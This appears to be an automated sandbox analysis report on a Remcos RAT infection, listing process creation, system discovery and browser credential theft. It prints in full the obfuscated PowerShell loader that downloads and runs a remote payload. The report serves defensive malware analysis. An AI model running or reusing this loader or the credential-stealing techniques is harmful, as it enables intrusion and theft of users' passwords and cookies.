Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bz#hu#cgbl#hq#aqbl#hm#i##9#c##jwb0#hg#d##u#g0#aqbo#gu#awbh#hq#bwb0#hm#c#bl#hq#cwb0#hm#zqbi#hm#aqbo#hi#bwbm#hm#zwbu#gk#a#b0#hq#cwbl#gi#zwbu#gk#d#bh#gu#cgbj#c8#yqbz#gk#dg#v#h##c#bt#ge#e##v#di#mw#u#dm#mg#x#c4#nq#0#di#lg#y#dc#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#c##pq#g#cq#cwb1#hi#zqb0#gk#zqbz#c##lqby#gu#c#bs#ge#ywbl#c##jw#j#cc#l##g#cc#d##n#ds#j#bt#g8#bwby#gw#yqbu#gq#cw#g#d0#i##n#gg#d#b0#h##og#v#c8#mg#x#dc#lg#x#du#n##u#du#nq#u#de#o##1#c8#e#bh#g0#c#bw#c8#yw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#jw#7#cq#zwbv#gw#z#bj#hu#c##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#j#bl#g4#ywby#gk#bqbz#g8#bg#g#d0#i##k#gc#bwbs#gq#ywb1#h##lgbe#g8#dwbu#gw#bwbh#gq#r#bh#hq#yq#o#cq#bqbv#g8#cgbs#ge#bgbk#hm#kq#7#cq#dqbu#h##cgbv#hy#bwbr#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gu#bgbj#hi#aqbt#hm#bwbu#ck#ow#k#eq#yqbj#gk#yqbu#hm#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#k#gc#bwbu#g8#ywbh#gw#eqbj#gu#cw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##9#c##j#b1#g4#c#by#g8#dgbv#gs#zqbk#c4#sqbu#gq#zqb4#e8#zg#o#cq#r#bh#gm#aqbh#g4#cw#p#ds#j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#d0#i##k#hu#bgbw#hi#bwb2#g8#awbl#gq#lgbj#g4#z#bl#hg#twbm#cg#j#bn#g8#bgbv#gm#yqbs#hk#ywbl#hm#kq#7#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#c##lqbn#gu#i##w#c##lqbh#g4#z##g#cq#bwby#hq#a#bv#gq#bwb4#g4#zqbz#hm#i##t#gc#d##g#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##r#d0#i##k#eq#yqbj#gk#yqbu#hm#lgbm#gu#bgbn#hq#a##7#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#i##9#c##j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#c0#i##k#ge#bgb0#gk#ywbo#hi#zqb0#gk#yw#7#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#c##pq#g#cq#dqbu#h##cgbv#hy#bwbr#gu#z##u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#l##g#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#kq#7#cq#cgbl#hm#yqb6#hu#cgbp#g4#i##9#c##wwbt#hk#cwb0#gu#bq#u#em#bwbu#hy#zqby#hq#xq#6#do#rgby#g8#bqbc#ge#cwbl#dy#n#bt#hq#cgbp#g4#zw#o#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#ck#ow#k#gq#zqbj#gu#bgb0#hi#yqb0#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#ugbl#gy#b#bl#gm#d#bp#g8#bg#u#ee#cwbz#gu#bqbi#gw#eqbd#do#ogbm#g8#yqbk#cg#j#by#gu#cwbh#ho#dqby#gk#bg#p#ds#j#b2#gu#cwb0#gu#zq#g#d0#i#bb#gq#bgbs#gk#yg#u#ek#tw#u#eg#bwbt#gu#xq#u#ec#zqb0#e0#zqb0#gg#bwbk#cg#jwbw#ee#sq#n#ck#lgbj#g4#dgbv#gs#zq#o#cq#bgb1#gw#b##s#c##wwbv#gi#agbl#gm#d#bb#f0#xq#g#e##k##k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#cw#jw#n#cw#jw#n#cw#jw#n#cw#jwbd#ge#cwbq#g8#b##n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#y#cc#kq#p##=='; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::frombase64string($codigo.replace('#','a'))); invoke-expression $owjuxd"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bz#hu#cgbl#hq#aqbl#hm#i##9#c##jwb0#hg#d##u#g0#aqbo#gu#awbh#hq#bwb0#hm#c#bl#hq#cwb0#hm#zqbi#hm#aqbo#hi#bwbm#hm#zwbu#gk#a#b0#hq#cwbl#gi#zwbu#gk#d#bh#gu#cgbj#c8#yqbz#gk#dg#v#h##c#bt#ge#e##v#di#mw#u#dm#mg#x#c4#nq#0#di#lg#y#dc#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#c##pq#g#cq#cwb1#hi#zqb0#gk#zqbz#c##lqby#gu#c#bs#ge#ywbl#c##jw#j#cc#l##g#cc#d##n#ds#j#bt#g8#bwby#gw#yqbu#gq#cw#g#d0#i##n#gg#d#b0#h##og#v#c8#mg#x#dc#lg#x#du#n##u#du#nq#u#de#o##1#c8#e#bh#g0#c#bw#c8#yw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#jw#7#cq#zwbv#gw#z#bj#hu#c##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#j#bl#g4#ywby#gk#bqbz#g8#bg#g#d0#i##k#gc#bwbs#gq#ywb1#h##lgbe#g8#dwbu#gw#bwbh#gq#r#bh#hq#yq#o#cq#bqbv#g8#cgbs#ge#bgbk#hm#kq#7#cq#dqbu#h##cgbv#hy#bwbr#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gu#bgbj#hi#aqbt#hm#bwbu#ck#ow#k#eq#yqbj#gk#yqbu#hm#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#k#gc#bwbu#g8#ywbh#gw#eqbj#gu#cw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##9#c##j#b1#g4#c#by#g8#dgbv#gs#zqbk#c4#sqbu#gq#zqb4#e8#zg#o#cq#r#bh#gm#aqbh#g4#cw#p#ds#j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#d0#i##k#hu#bgbw#hi#bwb2#g8#awbl#gq#lgbj#g4#z#bl#hg#twbm#cg#j#bn#g8#bgbv#gm#yqbs#hk#ywbl#hm#kq#7#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#c##lqbn#gu#i##w#c##lqbh#g4#z##g#cq#bwby#hq#a#bv#gq#bwb4#g4#zqbz#hm#i##t#gc#d##g#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##r#d0#i##k#eq#yqbj#gk#yqbu#hm#lgbm#gu#bgbn#hq#a##7#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#i##9#c##j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#c0#i##k#ge#bgb0#gk#ywbo#hi#zqb0#gk#yw#7#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#c##pq#g#cq#dqbu#h##cgbv#hy#bwbr#gu#z##u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#l##g#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#kq#7#cq#cgbl#hm#yqb6#hu#cgbp#g4#i##9#c##wwbt#hk#cwb0#gu#bq#u#em#bwbu#hy#zqby#hq#xq#6#do#rgby#g8#bqbc#ge#cwbl#dy#n#bt#hq#cgbp#g4#zw#o#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#ck#ow#k#gq#zqbj#gu#bgb0#hi#yqb0#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#ugbl#gy#b#bl#gm#d#bp#g8#bg#u#ee#cwbz#gu#bqbi#gw#eqbd#do#ogbm#g8#yqbk#cg#j#by#gu#cwbh#ho#dqby#gk#bg#p#ds#j#b2#gu#cwb0#gu#zq#g#d0#i#bb#gq#bgbs#gk#yg#u#ek#tw#u#eg#bwbt#gu#xq#u#ec#zqb0#e0#zqb0#gg#bwbk#cg#jwbw#ee#sq#n#ck#lgbj#g4#dgbv#gs#zq#o#cq#bgb1#gw#b##s#c##wwbv#gi#agbl#gm#d#bb#f0#xq#g#e##k##k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#cw#jw#n#cw#jw#n#cw#jw#n#cw#jwbd#ge#cwbq#g8#b##n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#y#cc#kq#p##=='; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::frombase64string($codigo.replace('#','a'))); invoke-expression $owjuxd"			Jump to behavior

Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerG
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerk-
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0-
Source: CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, jasgbtisot.dat.8.dr	Binary or memory string: [2025/03/26 10:28:15 Program Manager]
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerO-
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerles\*-
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\|

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00435034 cpuid

8_2_00435034

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoA,	8_2_0040F26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_004520E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_00452097
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_0045217D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_0045220A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_0044844E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	8_2_0045245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_00452583
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	8_2_0045268A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00452757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	8_2_00448937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_00451E1F

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00404961 GetLocalTime,CreateEventA,CreateThread,

8_2_00404961

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041BB0E GetComputerNameExW,GetUserNameW,

8_2_0041BB0E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_004491DA

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_004192F2 GetVersionExW,

9_2_004192F2

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

8_2_0040B59B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		8_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \key3.db		8_2_0040B6B5

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
